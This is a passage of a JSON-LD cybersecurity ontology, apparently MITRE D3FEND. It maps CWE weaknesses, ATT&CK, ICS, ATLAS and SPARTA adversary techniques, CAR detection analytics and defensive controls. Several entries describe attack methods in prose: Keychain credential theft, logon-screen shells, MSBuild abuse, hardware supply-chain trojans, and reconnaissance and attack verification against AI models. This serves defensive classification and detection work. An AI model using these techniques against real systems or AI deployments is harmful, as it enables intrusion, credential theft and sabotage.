        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002355"
    },
    {
      "@id": "d3f:M1027",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:One-timePassword"
        },
        {
          "@id": "d3f:StrongPasswordPolicy"
        }
      ],
      "rdfs:label": "Password Policies"
    },
    {
      "@id": "d3f:CWE-230",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-230",
      "d3f:definition": "The product does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.",
      "rdfs:label": "Improper Handling of Missing Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-229"
      }
    },
    {
      "@id": "d3f:Reference-CommandLaunchedFromWinLogon_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-008/"
      },
      "d3f:kb-abstract": "An adversary can use accessibility features (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within Remote Desktop. To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of cmd.exe or powershell.exe launched directly from the logon process, winlogon.exe. It should be used in tandem with CAR-2014-11-003, which detects the accessibility programs in the command line.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-008: Command Launched from WinLogon",
      "rdfs:label": "Reference - CAR-2014-11-008: Command Launched from WinLogon - MITRE"
    },
    {
      "@id": "d3f:T1127.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1127.001",
      "d3f:definition": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)",
      "d3f:modifies": {
        "@id": "d3f:CompilerConfigurationFile"
      },
      "d3f:runs": {
        "@id": "d3f:Compiler"
      },
      "rdfs:label": "MSBuild",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1127"
        },
        {
          "@id": "_:N532a507150ae47f48a29c7be90156b2e"
        },
        {
          "@id": "_:N1e5533d7c1ba4afda4cab8690347e396"
        }
      ]
    },
    {
      "@id": "_:N532a507150ae47f48a29c7be90156b2e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CompilerConfigurationFile"
      }
    },
    {
      "@id": "_:N1e5533d7c1ba4afda4cab8690347e396",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Compiler"
      }
    },
    {
      "@id": "d3f:CWE-842",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-842",
      "d3f:definition": "The product or the administrator places a user into an incorrect group.",
      "rdfs:label": "Placement of User into Incorrect Group",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-286"
      }
    },
    {
      "@id": "d3f:Reference-ContinuousAuthenticationByAnalysisOfKeyboardTypingCharacteristics_BradfordUniv.,UK",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://ieeexplore.ieee.org/document/491588?reload=true&arnumber=491588"
      },
      "d3f:kb-abstract": "This paper describes a simple, software based keyboard monitoring system for the IBM PC for the continuous analysis of the typing characteristics of the user for the purpose of continuous authentication. By exploiting the electrical characteristics of the PC keyboard interface together with modifications to the internal system timer, very accurate measurements can be made of keystroke interval and duration, including measurements of rollover. Rollover patterns, particularly when typing common diphthongs, can be highly characteristic of individual users and provide quite an accurate indication of the user's identity.\nPublished in: European Convention on Security and Detection, 1995.",
      "d3f:kb-author": "S.J. Shepherd",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bradford Univ., UK",
      "d3f:kb-reference-of": {
        "@id": "d3f:InputDeviceAnalysis"
      },
      "d3f:kb-reference-title": "Continuous authentication by analysis of keyboard typing characteristics",
      "rdfs:label": "Reference - Continuous authentication by analysis of keyboard typing characteristics - Bradford Univ., UK"
    },
    {
      "@id": "d3f:T1564.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.007",
      "d3f:definition": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)",
      "d3f:modifies": {
        "@id": "d3f:OfficeApplicationFile"
      },
      "rdfs:label": "VBA Stomping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N376c0e1ba8e8400da30f540830f767b2"
        }
      ]
    },
    {
      "@id": "_:N376c0e1ba8e8400da30f540830f767b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OfficeApplicationFile"
      }
    },
    {
      "@id": "d3f:has-contributor",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-contributor",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:AML.T0075",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0075",
      "d3f:definition": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.",
      "rdfs:label": "Cloud Service Discovery - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0075"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Cloud Service Discovery"
    },
    {
      "@id": "d3f:FileAccessEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is accessed for operations such as reading, opening, or inspecting its contents or metadata, without necessarily modifying its state.",
      "rdfs:label": "File Access Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nd3fca8de645041f3a090c3a368b5f261"
        },
        {
          "@id": "_:N9d535daee12144129eb2de02bda8e490"
        }
      ]
    },
    {
      "@id": "_:Nd3fca8de645041f3a090c3a368b5f261",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FilePathOpenFunction"
      }
    },
    {
      "@id": "_:N9d535daee12144129eb2de02bda8e490",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:VehicleOperatingMode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Vehicle Operating Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:AML.TA0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0002",
      "d3f:definition": "The adversary is trying to gather information about the AI system they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.\nSuch information may include details of the victim organizations' AI capabilities and research efforts.\nThis information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to obtain relevant AI artifacts, targeting AI capabilities used by the victim, tailoring attacks to the particular models used by the victim, or to drive and lead further Reconnaissance efforts.",
      "rdfs:label": "Reconnaissance - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Reconnaissance"
    },
    {
      "@id": "d3f:CWE-1069",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1069",
      "d3f:definition": "An invokable code block contains an exception handling block that does not contain any code, i.e. is empty.",
      "rdfs:label": "Empty Exception Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1071"
      }
    },
    {
      "@id": "d3f:T0892",
      "@type": "owl:Class",
      "d3f:attack-id": "T0892",
      "d3f:definition": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.",
      "rdfs:label": "Change Credential - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Change Credential"
    },
    {
      "@id": "d3f:RadiationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RadiationHardening"
      ],
      "d3f:d3fend-id": "D3-RH",
      "d3f:definition": "Radiation hardening is the process of making electronic components and circuits resistant to damage or malfunction caused by high levels of ionizing radiation.",
      "d3f:hardens": {
        "@id": "d3f:HardwareDevice"
      },
      "d3f:kb-article": "## How it works\n\nThere are three core radiation hardening methodologies:\n\n1. Radiation Hardening by Process (RHBP): modifying the physical fabrication of a semiconductor (e.g., using SOI - Silicon on Insulator), offering the highest intrinsic protection. Usually the most expensive option as it requires a specialized semiconductor fabrication plant.\n2. Radiation Hardening by Design (RHBD): modifying circuit topology and physical layout using techniques such as Triple Modular Redundancy (TMR). A more cost-effective option, with the constraint of potentially increasing chip area and power.\n3. Radiation Hardening by Shielding (RHBS): using physical materials (e.g., aluminum or tantalum) to block ionizing particles. Simple to implement, with the constraint of increasing size and weight.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ARadiationHardenedSARADCWithDelayBasedDualFeedbackFlipFlopsForSensorReadoutSystems"
        },
        {
          "@id": "d3f:Reference-DiagnosisOfFaultsInducedByRadiationAndCircuitLevelDesignMitigationTechniques"
        },
        {
          "@id": "d3f:Reference-MethodOfMakingThinAtomicZGradeShields"
        }
      ],
      "rdfs:label": "Radiation Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N730e0fa5309b42feaf7c6ffdb37a8e8f"
        }
      ]
    },
    {
      "@id": "_:N730e0fa5309b42feaf7c6ffdb37a8e8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CWE-374",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-374",
      "d3f:definition": "The product sends non-cloned mutable data as an argument to a method or function.",
      "rdfs:label": "Passing Mutable Objects to an Untrusted Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:IA-0001.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001.03",
      "d3f:definition": "Adversaries alter boards, modules, or programmable logic prior to delivery to create latent access or reliability sabotage. Tactics include inserting hardware Trojans in ASIC/FPGA designs, modifying bitstreams or disabling security fuses, leaving debug interfaces (JTAG/SWD/UART) active, substituting near-spec counterfeits, or embedding parts that fail after specific environmental or temporal conditions (“time-bomb” components). Other avenues target programming stations and “golden” images so entire lots inherit the same weakness. Microcontroller boot configurations, peripheral EEPROMs, and supervisory controllers are common leverage points because small changes there can reshape trust boundaries across the bus. The effect is a platform that behaves nominally through acceptance test yet enables covert control, targeted degradation, or delayed failure once on orbit.",
      "rdfs:label": "Hardware Supply Chain - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0001"
      },
      "skos:prefLabel": "Hardware Supply Chain"
    },
    {
      "@id": "d3f:kb-abstract",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-abstract y: The reference x has the abstract y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "kb-abstract",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-reference-annotation"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyScheduledTasksViaSchtasks_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2015-04-002/"
      },
      "d3f:kb-abstract": "An adversary can move laterally using the schtasks command to remotely schedule tasks. Although these events can be detected with command line analytics CAR-2013-08-001, it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as PowerShell. In these cases, an additional source of data becomes necessary to detect adversarial behavior. When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established (CAR-2014-05-001), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.\n\nCertain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats:\n\n* UUID 86d35949-83c9-4044-b424-db363231fd0c (decoded)\n* Hex 49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c (raw)\n* ASCII IYD@$621 (printable bytes only)\n\nThis identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks",
      "rdfs:label": "Reference - CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks - MITRE"
    },
    {
      "@id": "d3f:PrivateKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A private key can be used to decrypt messages encrypted using the corresponding public key, or used to sign a message that can be authenticated with the corresponding public key.",
      "d3f:has-dependent": {
        "@id": "d3f:PublicKey"
      },
      "rdfs:label": "Private Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AsymmetricKey"
        },
        {
          "@id": "_:N4cc39d888ef3421c8e58a5157cf0ede1"
        }
      ]
    },
    {
      "@id": "_:N4cc39d888ef3421c8e58a5157cf0ede1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-dependent"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PublicKey"
      }
    },
    {
      "@id": "d3f:WatchdogTimerConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a watchdog timer's timeout period or recovery action is configured.",
      "rdfs:label": "Watchdog Timer Configuration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtSetInformationFileArgumentFileDispositionInformation",
      "@type": "owl:Class",
      "d3f:definition": "Request to delete the file when it is closed or cancel a previously requested deletion.",
      "rdfs:label": "Windows NtSetInformationFile Argument FileDispositionInformation",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntsetinformationfile"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:CCI-001239_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs malicious code protection mechanisms at information system entry and exit points to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001239"
    },
    {
      "@id": "d3f:T1555.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:MacOSKeychain"
      },
      "d3f:attack-id": "T1555.001",
      "d3f:definition": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.",
      "rdfs:label": "Keychain",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1555"
        },
        {
          "@id": "_:N4a87e010520341fa9641e4b74c060120"
        }
      ]
    },
    {
      "@id": "_:N4a87e010520341fa9641e4b74c060120",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MacOSKeychain"
      }
    },
    {
      "@id": "d3f:CWE-493",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-493",
      "d3f:definition": "The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.",
      "rdfs:label": "Critical Public Variable Without Final Modifier",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:Reference-PrivacyAndSecuritySystemsAndMethodsOfUse",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10128890B2/en"
      },
      "d3f:kb-author": "Teddy David Thomas",
      "d3f:kb-reference-title": "Privacy and security systems and methods of use",
      "rdfs:label": "Reference - Privacy and security systems and methods of use"
    },
    {
      "@id": "d3f:ExactMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EM",
      "d3f:definition": "Exact matching for numeric types is just the simple test for mathematical equivalence of the values being matched.",
      "d3f:kb-article": "## References\n1. Equality (mathematics). (2023, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Equality_(mathematics))",
      "d3f:synonym": "Numeric Equivalence Matching",
      "rdfs:label": "Exact Matching",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EquivalenceMatching"
        },
        {
          "@id": "d3f:NumericPatternMatching"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000771_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses multifactor authentication for network access to privileged accounts where one of the factors is provided by a device separate from the information system being accessed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000771"
    },
    {
      "@id": "d3f:CWE-112",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-112",
      "d3f:definition": "The product accepts XML from an untrusted source but does not validate the XML against the proper schema.",
      "rdfs:label": "Missing XML Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1286"
      }
    },
    {
      "@id": "d3f:CWE-342",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-342",
      "d3f:definition": "An exact value or random number can be precisely predicted by observing previous values.",
      "rdfs:label": "Predictable Exact Value from Previous Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-340"
      }
    },
    {
      "@id": "d3f:ReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A program that needs to access data from a file stored in a file system uses the read system call. The file is identified by a file descriptor that is normally obtained from a previous call to open. This system call reads in data in bytes, the number of which is specified by the caller, from the file and stores them into a buffer supplied by the calling process.",
      "d3f:reads": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Read File",
      "rdfs:seeAlso": {
        "@id": "dbr:Read_(system_call)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ncb65c6247dd845a58029eebd91398d7d"
        }
      ]
    },
    {
      "@id": "_:Ncb65c6247dd845a58029eebd91398d7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:LateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to move through your environment.",
      "d3f:enables": {
        "@id": "d3f:TA0008"
      },
      "rdfs:label": "Lateral Movement Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N0519a76fe6bf409786483e969616c0fd"
        }
      ]
    },
    {
      "@id": "_:N0519a76fe6bf409786483e969616c0fd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0008"
      }
    },
    {
      "@id": "d3f:AML.T0042",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0042",
      "d3f:definition": "Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model.\nThis gives the adversary confidence that their approach works and allows them to carry out the attack at a later time of their choosing.\nThe adversary may verify the attack once but use it against many edge devices running copies of the target model.\nThe adversary may verify their attack digitally, then deploy it in the [Physical Environment Access](/techniques/AML.T0041) at a later time.\nVerifying the attack may be hard to detect since the adversary can use a minimal number of queries or an offline copy of the model.",
      "rdfs:label": "Verify Attack - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0042"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Verify Attack"
    },
    {
      "@id": "d3f:InterprocessCommunication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, inter-process communication or interprocess communication (IPC) refers specifically to the mechanisms an operating system provides to allow processes it manages to share data. Typically, applications can use IPC categorized as clients and servers, where the client requests data and the server responds to client requests. Many applications are both clients and servers, as commonly seen in distributed computing. Methods for achieving IPC are divided into categories which vary based on software requirements, such as performance and modularity requirements, and system circumstances, such as network bandwidth and latency.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Inter-process_communication"
      },
      "rdfs:label": "Interprocess Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:OTExceptionMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An unknown or anomalous condition occurred in the system.",
      "rdfs:label": "OT Exception Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N0aa6070ef5494e3a80f2b56fd833966d"
        }
      ]
    },
    {
      "@id": "_:N0aa6070ef5494e3a80f2b56fd833966d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTExceptionMessage"
      }
    },
    {
      "@id": "d3f:StatisticalMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SM",
      "d3f:definition": "Building methods using the mathematical study of the likelihood and probability of events occurring based on known information and inferred by taking a limited number of samples.",
      "d3f:kb-article": "## References\nWolfram MathWorld. (n.d.). Statistics. [Link](https://mathworld.wolfram.com/Statistics.html)",
      "rdfs:label": "Statistical Method",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticTechnique"
      }
    },
    {
      "@id": "d3f:CWE-1294",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1294",
      "d3f:definition": "The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented.",
      "rdfs:label": "Insecure Security Identifier Mechanism",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:OperationalActivityMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalActivityMapping"
      ],
      "d3f:d3fend-id": "D3-OAM",
      "d3f:definition": "Operational activity mapping identifies activities of the organization and the organization's suborganizations, groups, roles, and individuals that carry out the activities and then establishes the dependencies of the activities on the systems and people that perform those activities.",
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CatiaUAFPlugin"
      },
      "d3f:synonym": "Mission Mapping",
      "rdfs:label": "Operational Activity Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nf497256fb6bf4e349f7064cbd778015f"
        }
      ]
    },
    {
      "@id": "_:Nf497256fb6bf4e349f7064cbd778015f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:CCI-002233_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents organization-defined software from executing at higher privilege levels than users executing the software.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002233"
    },
    {
      "@id": "d3f:Reference-ProtocolBasedDetectionOfSuspiciousNetworkTraffic",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10084816B2/"
      },
      "d3f:kb-abstract": "Embodiments of the present invention relate to identification of suspicious network traffic indicative of a Botnet and/or an Advanced Persistent Threat (APT) based on network protocol of such traffic. According to one embodiment, a traffic file is received at a network security device that is protecting a private network. The traffic file contains therein network traffic associated with the private network that has been captured and stored. The received traffic file is processed by the network security device to determine whether the network traffic relates to a network protocol that is indicative of existence of a network security threat within the private network. When existence of the network security threat is detected, then the network security device reports details regarding the network security threat.",
      "d3f:kb-organization": "Fortinet",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationProtocolCommandAnalysis"
      },
      "d3f:kb-reference-title": "Protocol based detection of suspicious network traffic",
      "rdfs:label": "Reference - Protocol based detection of suspicious network traffic"
    },
    {
      "@id": "d3f:T1485.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1485.001",
      "d3f:definition": "Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.",
      "rdfs:label": "Lifecycle-Triggered Deletion",
      "rdfs:subClassOf": {
        "@id": "d3f:T1485"
      }
    },
    {
      "@id": "d3f:VectorImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphical image created using mathematical equations and geometric shapes defined by vectors.",
      "rdfs:label": "Vector Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalImage"
      }
    },
    {
      "@id": "d3f:M1019",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Establishing and running a Threat Intelligence Program is outside the scope of D3FEND.",
      "rdfs:label": "Threat Intelligence Program"
    },
    {
      "@id": "d3f:HTTPGetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP GET method is used to request a representation of the specified resource.",
      "rdfs:label": "HTTP GET Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:CWE-1024",
      "@type": "owl:Class",
